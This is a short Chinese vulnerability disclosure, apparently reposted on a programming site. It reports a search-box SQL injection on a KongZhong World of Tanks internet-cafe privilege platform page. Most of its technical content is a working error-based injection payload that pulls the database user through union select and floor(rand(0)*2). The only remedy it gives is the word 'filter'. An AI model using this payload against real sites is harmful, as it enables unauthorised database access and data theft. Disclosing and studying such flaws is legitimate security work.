好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

空中网坦克世界游戏网吧特权平台页面搜索型注

作者:路人甲

简要描述: 未过滤 详细说明:

 

漏洞 证明:

 

%' union select 1,(select 1 from(select count(*),concat((select (Select user()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a) and '%'=' 修复方案: 过滤

查看更多关于空中网坦克世界游戏网吧特权平台页面搜索型注的详细内容...

  阅读:38次